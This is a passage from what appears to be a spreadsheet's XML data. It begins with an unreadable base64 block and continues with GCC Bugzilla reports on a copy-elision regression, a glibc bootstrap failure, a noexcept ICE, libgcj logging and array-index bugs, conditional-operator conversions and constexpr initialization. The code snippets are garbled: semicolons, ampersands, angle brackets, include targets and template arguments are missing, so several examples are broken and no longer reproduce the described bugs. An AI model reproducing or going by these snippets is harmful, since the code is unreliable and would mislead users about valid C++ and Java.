 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
 /rPd0/xVQeDlw9YAYZLiGEwm</t>
  </si>
  <si>
    <t>dnovillo</t>
  </si>
  <si>
    <t>GCC-16405</t>
  </si>
  <si>
    <t>[3.4 Regression] Temporary aggregate copy not elided</t>
  </si>
  <si>
    <t>I have been compiling the following snippet with g++ version 3.3.4 3.4.0
3.5.0. They are Debian packages so the 3.4.0 version is a bit old (and a
prerelease) sorry. So maybe the bug has already been fixed in g++ 3.4. However
it is still present in a recent snapshot of the trunk. In the following the
function goes from using only one temporary in g++ 3.3 to using four temporaries
in g++ 3.5.
--------------------------------------------------------------------
struct T {
  int a[128]
  // T(T const 
  T 
  T operator+(T const  t += v return t }
}
extern T a b c
void f() { a = b + c }
--------------------------------------------------------------------
So the code just describes a big plain structure and its operator+ is defined
with its operator+=. The function f computes an addition and operator+ is
inlined into it.
When compiling with g++ 3.3 the generated assembly is optimal: there is only
one temporary b is copied into this temporary c is added to this temporary
the result is then assigned to a.
When compiling with g++ 3.4 it is no more optimal: there are two temporaries b
is copied into one c is added to this temporary holding b the result is copied
into the other temporary and the temporary is then assigned to a. Maybe the
NRVO did not kick in?
When compiling with g++ 3.5 it is even worse: there are four temporaries b is
copied into one c is added to this temporary holding b the result then goes
into two successive temporaries before being assigned to a. So there is one copy
that does not mean anything with respect to the code? And please note there is
one temporary that just lies on the stack and is never used (since only three
temporaries are used not four).
If a copy constructor is added (just comment out the line) the three compilers
generate a similar code: only one temporary is ever used. It is the expected and
optimal code generation. So it seems g++ has some kind of problem with the
default copy constructor starting with 3.4.
As a side note even with a non-default copy constructor g++ 3.5 still
allocates a temporary that is never used. Maybe it is an unrelated bug?
The snippet is each time compiled with
$ g++-... -Wall -O3 -S test.cpp
Here are the exact versions used.
$ LANG=C g++-3.3 -v
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.4/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.4 (Debian 1:3.3.4-2)
$ LANG=C g++-3.4 -v
Reading specs from /usr/lib/gcc/i486-linux/3.4.0/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--libexecdir=/usr/lib --with-gxx-include-dir=/usr/include/c++/3.4
--enable-shared --with-system-zlib --enable-nls --enable-threads=posix
--without-included-gettext --program-suffix=-3.4 --enable-__cxa_atexit
--enable-clocale=gnu --enable-libstdcxx-debug --enable-java-gc=boehm
--enable-java-awt=gtk --disable-werror i486-linux
Thread model: posix
gcc version 3.4.0 20040403 (prerelease) (Debian)
$ LANG=C g++-snapshot -v
Reading specs from /usr/lib/gcc-snapshot/lib/gcc/i486-linux-gnu/3.5.0/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf95objc
--prefix=/usr/lib/gcc-snapshot --enable-shared --with-system-zlib --enable-nls
--enable-threads=posix --without-included-gettext --disable-werror
--enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug
--enable-java-gc=boehm --enable-java-awt=gtk i486-linux-gnu
Thread model: posix
gcc version 3.5.0 20040704 (experimental)</t>
  </si>
  <si>
    <t>GCC-8151</t>
  </si>
  <si>
    <t>GCC 3.2 fails to bootstrap with glib 2.3</t>
  </si>
  <si>
    <t>Linux 2.4.19/glibc 2.3/make 3.80/binutils 2.13
(test of integration)
Actually gcc did compile itself but failed to build the libstdc++. Failure was unknown __newlocale in libstdc++ build certainly due to glibc 2.3 header change.
Quite difficult to find stable couple of glibc/gcc that compiles each other: glibc 2.2.5 fails with gcc 3.2 (since 3.1.1 actually) glibc 2.2.6 would but is not out glibc 2.3 succeeded but broke gcc now. Hence it would be nice (if this is a gcc bug) to be fixed for gcc 3.2.1 (last couple that worked was 2.2.5 / 3.1).
Release:
3.2
How-To-Repeat:
I guess building libstdc++ would suffice.</t>
  </si>
  <si>
    <t>casteyde.christian</t>
  </si>
  <si>
    <t>GCC-54207</t>
  </si>
  <si>
    <t>[4.7 Regression][C++0x] ICE in build_noexcept_spec when bool is #defined/typedef'd</t>
  </si>
  <si>
    <t>This ICE occurs under unique/odd but reproducible conditions.  The key components of the environment for this bug appear to be:
1. 'bool' is typedef'd to a new type which is then #define'd over the existing 'bool' type (this is the case in the common.h head from the ldns package http://www.nlnetlabs.nl/projects/ldns/).
2. A user-defined class inherits from a templated base class like std::vector.
3. This same class calls a noexcept method on a vector member (which appears to trigger the build_noexcept_spec function).
This bug is reproducible with the following code on gcc-4.7.  It compiles without error on gcc-4.6:
----------------------------------------------
typedef bool _Bool
# define bool _Bool
#include 
#include 
#include 
using namespace std
class Test : public vector {
public:
  Test (Test&amp; that) {
    arr = std::move(that.arr)
  }
private:
  std::vector arr
}</t>
  </si>
  <si>
    <t>andrewjcg</t>
  </si>
  <si>
    <t>GCC-18893</t>
  </si>
  <si>
    <t>null pointer exception in the Logger.getCallerStackFrame()</t>
  </si>
  <si>
    <t>I have a problem using the java.util.logging.Logger from a Java function  that
originates from a JNI call. Apparently I get a null pointer exception in the
Logger.getCallerStackFrame() method. This is the stacktrace:
   at
_ZN4java4util7logging6Logger19getCallerStackFrameEv(/usr/lib64/libgcj.so.5.0.0)
   at
_ZN4java4util7logging6Logger3logEPNS1_5LevelEPNS_4lang6StringEP6JArrayIPNS5_6ObjectEE(/usr/lib64/libgcj.so.5.0.0)
   at
_ZN4java4util7logging6Logger3logEPNS1_5LevelEPNS_4lang6StringE(/usr/lib64/libgcj.so.5.0.0)
   at
_ZN4java4util7logging6Logger4infoEPNS_4lang6StringE(/usr/lib64/libgcj.so.5.0.0)
   at org.postgresql.pljava.example.Parameters.print(java.sql.Date)(Unknown Source)
   at
_ZN16_Jv_InterpMethod9run_classEP7ffi_cifPvP7ffi_rawS2_(/usr/lib64/libgcj.so.5.0.0)
   at
_Z18_Jv_CallAnyMethodAPN4java4lang6ObjectEPNS0_5ClassEP10_Jv_MethodbbP6JArrayIS4_EP6jvalueSB_b(/usr/lib64/libgcj.so.5.0.0)
E
Andrew Haley reports that this cannot be reproduced with 4.0-pre so perhaps this
has been fixed already.</t>
  </si>
  <si>
    <t>thhal</t>
  </si>
  <si>
    <t>GCC-5361</t>
  </si>
  <si>
    <t>ArrayIndexOutOfBounds where it should not be</t>
  </si>
  <si>
    <t xml:space="preserve">	java code:
	public void function(byte[] dst...)
	{
		int tmp
		byte dst_byte
		...
		copmuting tmp
		tmp is in range 0x0000 to 0xffff
		...
		// here is
		// dst.length = 2
		// dst_byte = 0
		dst[dst_byte] |= (tmp&gt;&gt;8)       &lt;&lt; (1) works
		dst[++dst_byte] |= (tmp  &lt;&lt; (2) dst_byte is now 2 !!
	}
	compiled with kaffe javac fails !
	compiled with sun javac works !
	changing (2) to ++dst_bytedst[dst_byte] != (tmp  works !
	dst_byte changes from 0 to 2
	this also happens if the array has more elements
	the last access fails if dst.length == 5
	dst_byte switches from 4 to 6 !!
	The code is executed in a modified commercial java2 MicroEdition
	I'm not sure if the gcj is correct and the bug is in the VM
	as the bug also occurs with the kaffe compiler
	Well I think the bug is most likely in the VM
	but strange nevertheless...
	Best Regards
	  Andi
Release:
3.0.3
Environment:
System: Linux Twisty 2.4.0 #5 Mit Mai 30 16:05:26 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure
How-To-Repeat:
	repeats every time</t>
  </si>
  <si>
    <t>andreas.lenz</t>
  </si>
  <si>
    <t>GCC-32019</t>
  </si>
  <si>
    <t>Conditional operator ?: and ambiguous convertions</t>
  </si>
  <si>
    <t>The following program should not compile (without warnings) on two counts but in fact only fails on one and not for the right reason as far as I can see.
class C
{
public:
  C(const char *)
  operator const char *()
}
void
foo (bool b)
{
  // Prove that the implicit convertions work both ways.
  C c = 1
  const char * s = C(2)
  // This is ambiguous both operands may be converted to the other's type.
  // However the compiler accepts it without a diagnostic.
  b ? 1 : C(2)
  // This is basically the same as the previous statement but it fails with
  // the error operands to ?: have different types.
  b ? c : s
}
Both conditional operators should fall foul of clause 5.16 paragraph 3 of the C++ standard. The last two operands are of different types and each may be implicitly converted to the opposite as demonstrated by the assignments above.
The second conditional operator looks like a different way of writing the first but fails with an error stating that the operands have different types. They do have different types but again the conversions should apply just the same.
If I alter the program to use a type other than const char * (such as int or another class type) then I get different results again which is surprising.</t>
  </si>
  <si>
    <t>andrew.stubbs</t>
  </si>
  <si>
    <t>GCC-51433</t>
  </si>
  <si>
    <t>constexpr caching leads to incorrect dynamic initialization</t>
  </si>
  <si>
    <t>Testcase:
constexpr int f()
constexpr int g() { return f() }
extern const int n = g()
constexpr int f() { return 42 }
extern const int m = g()
g++ uses dynamic initialization for both m and n. Static initialization is required to be used for m. We can upgrade this to a rejects-valid:
int arr[m] // error!</t>
  </si>
  <si>
    <t>richard-gccbugzilla</t>
  </si>
  <si>
    <t>GCC-82616</t>
  </si>
  <si>
